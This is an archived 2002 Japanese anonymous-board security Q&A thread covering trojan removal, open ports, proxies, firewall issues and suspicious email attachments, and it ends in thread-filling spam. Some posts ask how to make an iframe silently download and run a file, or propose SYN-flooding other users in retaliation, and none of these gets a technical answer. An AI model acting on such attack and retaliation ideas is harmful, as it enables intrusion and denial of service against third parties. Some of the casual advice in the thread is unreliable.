ネットをやっていると、ときどき変なのが画面に出てきます、一回ダウンロードしてしまって
削除出来なくなって(レジストリにまで食い込んでた)再インストールしました。
その時のモニターの画像をアップしてます。
知っている方います?

http://rain.prohosting.com/ixoxi/cgi-bin/imgbbss/img-box/img20020331024306.jpg
895 :02/03/31 19:10
>894
画面ボケてて読む気氏ねえよ!
プリントスクリーン知ってる?
896cheshire-cat:02/03/31 19:10
>>894
comet corsorか。
どこでそんな怪しいの拾ってきたんだか。
googleで探してみ。被害者たくさんいるから、駆除方法はすぐ見つかるかと。
897cheshire-cat:02/03/31 19:13
>>895
何そんなに頭に血上らせているんだ?
まあまあ。

niftyのwinfaqに確か載ってたけど、url捨てたんでわからん。
898名無しさん@お腹いっぱい。:02/03/31 19:15
netstat -a
で見てみたら、ポート44334が開きっぱなしなんですけど
これって何でしょ?ご存知の方情報お願いします。
899cheshire-cat:02/03/31 19:20
>>898
はっきり言います、調べようが無いっす。
と言うのも、どっかのトロイのデフォルトポートって回答は容易だが。
しかーし!
わざわざ仕込むのに、デフォルトポート使うわけもなく。

プロセス名調べて潰したらどうだろうか。
ちゅうかサービスとかスタートアップにゴミが入ってるかと。
900名無しさん@お腹いっぱい。:02/03/31 19:40
>>899
Tinyを手動起動にしたら閉じました。
こういう仕様なのですね。
回答ありがとうございました。
901cheshire-cat:02/03/31 19:43
>>900
Tinyだったのか???????
漏れ的にはとっても興味ある。

明日職場でやってみよ(らぶ
902900:02/03/31 19:49
え、もしや(゚д゚)マズー?

明日のご回答をお待ちしております・・・
903cheshire-cat:02/03/31 20:02
>>902
冷静になって考えてみた。
Tiny入れているパソって、しばらくメンテサボってるんだが。
自動アプデートとかそういう奴なんだろうか?

なぜスタートアップから外したら解決するんだろうか。
Ad-Aware使ったほうが近道のような気がする。
904あいうえお:02/03/31 20:33
至急無料のワクチンソフトの
アドレスください!!
日本語がいいです!!おねがいします!!
ひとだすけだとおもって!!
905 :02/03/31 20:48
>>904
体験版 シマンテック ノートン
明日は製品版を買いに行け
906cheshire-cat:02/03/31 20:50
907名無しさん@お腹いっぱい。:02/04/01 00:16
IPから相手を突き止めるって事
できるんですか?ホントに初心者です。
こんな質問でごめんなさい。
908名無しさん@お腹いっぱい。:02/04/01 00:19
どのプロバイダとかどの会社からのアクセスかはわかるかと
909名無しさん@お腹いっぱい。:02/04/01 00:26
>908
相手の個人情報までは分からないんですね?
あとご存知でしたら・・・
串ってなんですか?
串さすと言うのは・・・??
910 :02/04/01 01:23
>>909
proxyを経由させること
911名無しさん@お腹いっぱい。:02/04/01 09:26
>>910
proxy???それってなんですか?
無知ですんません(泣)
>>911
本当に無知ですね。自分で調べる方法も知らないんですか?
>>911
ネタか?
ネタじゃないんならココ見とけ
http://page.freett.com/jajara/index.htm

あと、わからない言葉が出てきたら自分で調べる癖をつけること。
914厨房:02/04/01 20:12
いつの間にかダイヤルアップに接続先が増えてて
気付いてすぐ消したけど
届いた請求書の金額がなんと17万円/2日!!
明日が支払い期限なんだけど
どーすればいいでしょう?
915cheshire-cat:02/04/01 20:13
>>914
Q2と国際電話、どっちよ?
916質問:02/04/01 21:05
BLACKICEをいれたところUDの送受信ができなくなりました。これはどう対応したらいいのでしょうか?
917cheshire-cat:02/04/01 21:13
914は討ち死か。。。。
一応Q2だったらNTTにゴネて文句つけて、弁護士立てて騒ぐと、払わなくても済む事があるって、書いておく。
918名無しさん@お腹いっぱい。:02/04/01 23:27
疲れた・・・。
トレンドマイクロのオンラインスキャンがどーしてもできません。
現在の設定では ActiveX が動きません
ていうエラーが出ます。インターネットオプションで低にしても
ダメです。考えられる原因にはどういうものがあるでしょうか。
919^\^:02/04/01 23:45
皆様〜教えてほしいんだけど…!!
「心地よい通信」ってどういう通信のことを言うのかな?って思って…
よかったらいろいろ教えてほしい。どういう通信だったら「心地よい」って感じる?
920 :02/04/01 23:47
>>918
ブラウザの異常
921 :02/04/01 23:51
http://ime.nu/
ってなんなんだ?
リファラ消すための中継ページ?みたいだけど
なんかのソフトなんですか?

アクセスログがこればっかになって眠れないです。
例えば中央競馬会のhttp://www.jra.go.jp/
http://ime.nu/をかますと
http://ime.nu/www.jra.go.jp/
となるんですが見てくれます?

922 :02/04/01 23:59
>>921
2ちゃんの仕様 
923名無しさん@お腹いっぱい:02/04/02 00:08
初心者版の「本当に答えが知りたい質問はこちらへ!」で解決
できなかった質問です。↓

みなさん、とっても困っています。
HPに荒らしが来ます。IPドメインSEARCHで検索してその住所をヤフーで
検索したところ、とある掲示板でハッキングの名前?として全く同じIP
が上がっていました。ということは自分はハッキングされているのですか?
プロバイダーのHPスペースを使っているので心配ですどうしたらいいか
教えて下さい。お願いします。

その検索結果ではまだHTML化されていないようですが2ちゃんねるの
「ウザイ奴のIP及び情報はここに。Part2」にものっていたものみたいです。
924Aho:02/04/02 00:13
>>918
ファイヤーウォールソフト入れてません?
私はZone Alarmってソフトを入れてましたが、
それをを終了するとできました
>>923
何がいいたいのかわからんので回答できる奴がいるはずがない。
しかし、ここはセキュ板だ超推理をもって回答しよう。

HP閉じろ。
926仕様書無しさん:02/04/02 01:24
WinXPのディスク買ってきて
F4キーを起動時に押して、パーティション切ったら
NTFSのファイルフォーマット。WinXPを入れる
それで その程度の奴なら十分だよ。
ホームページやられてもパソに入られることはまずない
そりゃトロイしこみゃ話は別だけど…変なの実行してないよね?
927名無しさん@お腹いっぱい。:02/04/02 01:31
無線ルーターを使っていて、PCにはウィルスバスターをいれてます。
でも、今にいたる3〜4ヶ月、ルーターのログにもウィルバスターの
ファイアーウォールのログにも不正アクセスの形跡はありません。
この板を見てると、皆さんは頻繁に不正アクセスを受けてるようなんですが、
こんなに長期にわたって不正アクセスされないなんてことはあるんでしょうか?
それとも、私のルーター、およびセキュリティーソフトの設定が間違ってる?
928923:02/04/02 01:34
>925
そうか、そうだよな。
逝ってくる。
929名無しさん@お腹いっぱい。:02/04/02 02:25
>>927
https://grc.com/x/ne.dll?bh0bkyd2

↑逝ってチェックしてみたらどうよ?
931名無しさん@お腹いっぱい。:02/04/02 08:38
>>924
ダメでした・・・あうあう。。
NIS入れてますけど、NAVだと発見出来なかったのが
トレンドマイクロのオンラインスキャンだと発見できた、
っていう話がちょこちょこあるので是非一度やりたいと
思っているのですが。
NIS2001だし、どうせNIS2002を買わなきゃいかんかなーと
思っていたとこなのでこの際VB2002を買おうかと思います。
932__:02/04/02 09:14
ifame中にファイルを指定すると、勝手にダウンロード -> 実行
とできるそうなのですが、どのように記述するのでしょうか?

脆弱性のテストに使用したいので、よろしくおねがいします。
933 :02/04/02 09:19
アクセス解析で取得した荒らし厨房のIPやホストを公開するのは違法ですか?

最近パソコンを買ったら名前は忘れたけどウイルスチェックソフトが入っていました。
このソフト常駐しているようなのですが、ウイルスチェックソフトは
常駐させないと意味ないんですか?
たまに起動して検査するとかでもいいんでしょうか。
常駐しているとシステムリソースを食いそうで嫌なんですが。
935 :02/04/02 10:55
>>930
「Closed!」が一つで、後は全部「Stealth!」でした。
もう一つのテストも大丈夫だったようです。
問題は無いみたいです。
936 :02/04/02 13:31
>>933
違法じゃないけど公開してもあまり意味ないよ

>>934
意味ないことはないけど、感染する割り合いは高くなるだろうね
937(ー_ー;):02/04/02 15:31
会社のPCにアクセスしてくるやつのMACアドレス特定できたのですが
これで本当に100%そいつだといいきれつのでしょうか?
ネットの技術にあまり詳しくないのでもしかしたらMACアドレスというのが詐称できるのでは
ないかと思っております。
詳しい方おられましたらMACアドレスが詐称できるのかどうか教えていただけると幸いです。
>>937
できる
939(ー_ー;):02/04/02 16:22
>>938
じゃあ今回のことで特定できたとはいいきれないわけですね
ttp://x-treme.i.am/
のX-GUARDてどうよ?
941名無しさん@お腹いっぱい。:02/04/02 20:02
チャットの裏入室はどうやるんですか?
>941
初級ネット板に逝(以下略
そもそもセキュリティと何の関係があるのかと小一時間(以下略
943cheshire-cat:02/04/02 21:09
すんません、大変馬鹿馬鹿しい質問なんですが。
先日Windows板Win2000スレに書いたら、無視されたんで自己終了してきました。

Win2000proが入ってる古いパソがありまして。
なんだかドライバが合わなくて、Windows Updateから新しいドライバ落としてきて解決していたんですが。

そいつに回復コンソール入れてみました。
とたんに数々のドライバが死にまして。まともに稼動しません。
オーディオ関連、ディスプレイ、その他(鬱

漏れだけなんでしょうか、そゆ体験。
勝手に使用されてしまうsmtpサーバ

cop.dip.jp

DOCOMOに来たSPAMのFROMに書いてあったよ
>>943
なんで無視されたのかなんとなくわかる。
946cheshire-cat:02/04/02 21:57
>>945
漏れも我ながら、何となくわかる。
リースじゃないから、当分使わなければならんので、鬱。
不正アクセスって一般人もやられるものなの?
そゆことする人はなんのメリットがあってやつんでしょ?
948 :02/04/02 23:25
>>947
やられないと思うよ
メリットはたくさん 情報を盗めるし
949初心者:02/04/02 23:40
ゾーンアラームで警告がでたらとりあえずNOでいいんですか?
950初心者:02/04/03 00:00
202.225.94.247

10分間に100回近くきたのですがどうすればいいのでしょうか。
951名無しさん@お腹いっぱい。:02/04/03 00:32
hello,○○(俺のメアドの@より先の部分),meeting,notic

っていう件名のメールがきたんですけどウイルスですかねぇ
MX厨が6699叩いてうざいからsyn floodingでも喰らわしてやろうかと思うけど、
もっと効果的なのある?
掲示板の荒らし方や侵入の方法、メールボムの送り方等、
攻撃方法の質問はご遠慮下さい。
954名無しさん@お腹いっぱい。:02/04/03 00:38
プロクシの設定のをしようと思ったんですが
アドレスとポートはどうやって手に入れるんですか??
955名無しさん@お腹いっぱい。:02/04/03 00:39
送信者:Postmaster。件名:Undeliverable--"height"
というメールが届きました。
内容は

The following mail can't be sent to **********(伏字)

From: **********(伏字)
To: **********(伏字)
Subject: height
The file is the original mail

で、↓の添付ファイルも二つセットです。

Wz.exe
Movies〔1〕.jpg

これって何でしょう?

*Fromが自分のアカウントになってるんですが、
送信先のアカウントは知らないし、もちろん送った心当たりは全く無し。
当然添付ファイルは開いてないけど、これって何?ウィルス?
気になって夜も眠れません・・・・・
956952:02/04/03 00:46
>>953 スマン
MX厨が俺の帯域勝手に使いやがるから防御しようと思うが、syn floodingより効果的なのある?
957名無しさん@お腹いっぱい。:02/04/03 00:49
0ぱっち
件名が「your password」というファイルつきのメールが来たんですが、
やっぱりウィルスですか?
とりあえず削除したんですが。
959名無しさん@お腹いっぱい。:02/04/03 01:38
たぶん
960名無しさん@お腹いっぱい。:02/04/03 09:34
 
961名無しさん@お腹いっぱい。:02/04/03 09:42
EJOCKHEJ.EXEってファイルが添付された
差出人不明、件名・本文無しのメールが来たんですが、
やっぱウイルスですか?
>961
http://www.symantec.com/region/jp/sarcj/data/w/w95.hybris.gen.html
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_HYBRIS.A&VSect=T

Hybrisというウイルス。
AB****ABのように、ファイル名の最初の2文字と最後の2文字が同じ場合はHybrisの可能性あり。
日本語環境だと、差出人・件名・本文は空白になる。

なお、実行しなければ感染しません。
>>962
どうもありがとうございます。
くだらねぇ質問はここに書き込め Ver2.15 http://pc.2ch.net/test/read.cgi/sec/1017903445/l50
965名無しさん@お腹いっぱい。:02/04/05 00:01
スレ一覧の下のほうの 542: 【$ANCOR:22】 (22)ってなんだろね。
>>965
一度書き込みしたら直る、らしいです
くだらねぇ質問はここに書き込め Ver2.15 http://pc.2ch.net/test/read.cgi/sec/1017903445/1-6
968埋め立て屋:02/04/06 07:51
くだらねぇ質問はここに書き込め Ver2.15
http://pc.2ch.net/test/read.cgi/sec/1017903445/1-5
くだらねぇ質問はここに書き込め Ver2.15
971 :02/04/06 20:26
age
972 :02/04/06 20:27
z
973a:02/04/06 20:30
a
974 :02/04/06 21:44
くだらねぇ質問はここに書き込め Ver2.15
975 :02/04/06 21:45
976 :02/04/06 21:46
*
977 :02/04/06 22:02
~
978 :02/04/06 22:25
.
979 :02/04/06 22:40
くだらねぇ質問はここに書き込め Ver2.15
980 :02/04/06 22:51
981 :02/04/06 23:03
@
982 :02/04/06 23:41
!
      すでにここは 乂1000獲り合戦場乂 です。

      \∧_ヘ     / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 ,,、,、,,, / \〇ノゝ??< 1000獲り合戦、とっととはじめるモナッ!!       ,,、,、,,,
    /三??´∀`)/   \____________  ,,、,、,,,
     /三/| ゚U゚|\      ,,、,、,,,                       ,,、,、,,,
 ,,、,、,,, U (:::::::::::)  ,,、,、,,,         \オーーーーーーーッ!!/
      //三/|三|\     ∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧
      ?怐@ ?怐@      (    )    (     )   (    )    )
 ,,、,、,,,       ,,、,、,,,  ∧_∧∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧
      ,,、,、,,,       (    )    (    )    (    )    (    )
984 :02/04/07 00:28
くだらねぇ質問はここに書き込め Ver2.15
985 :02/04/07 00:29
986 :02/04/07 00:30
|
987v:02/04/07 00:39
くだらねぇ質問はここに書き込め Ver2.15
988阪神優勝:02/04/07 01:00

六甲おろしに颯爽と
蒼天翔ける日輪の
青春の覇気麗しく
輝く我が名ぞ阪神タイガース
オウ、オウ、オウオウ
阪神タイガース
フレ、フレフレフレ


闘志溌剌起つや今
熱血既に敵を衝く
獣王の意気高らかに
無敵の我等ぞ阪神タイガース
オウ、オウ、オウオウ
阪神タイガース
フレ、フレフレフレ


剛腕強打幾千たび
鍛えてここに甲子園
勝利に燃ゆる栄冠は
輝く我等ぞ阪神タイガース
オウ、オウ、オウオウ
阪神タイガース
フレ、フレフレフレ

990sage:02/04/07 01:24
sage
 
992名無しさん@お腹いっぱい。:02/04/07 03:24
1000
993名無しさん@お腹いっぱい。:02/04/07 03:25
1000     
994名無しさん@お腹いっぱい。:02/04/07 03:25
1000        
995名無しさん@お腹いっぱい。:02/04/07 03:25
1000                 
996名無しさん@お腹いっぱい。:02/04/07 03:25
1000                           
997名無しさん@お腹いっぱい。:02/04/07 03:26
1000                                 
998名無しさん@お腹いっぱい。:02/04/07 03:26
1000   
999名無しさん@お腹いっぱい。:02/04/07 03:26
1000                    
1000名無しさん@お腹いっぱい。:02/04/07 03:27
1000    
10011001
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。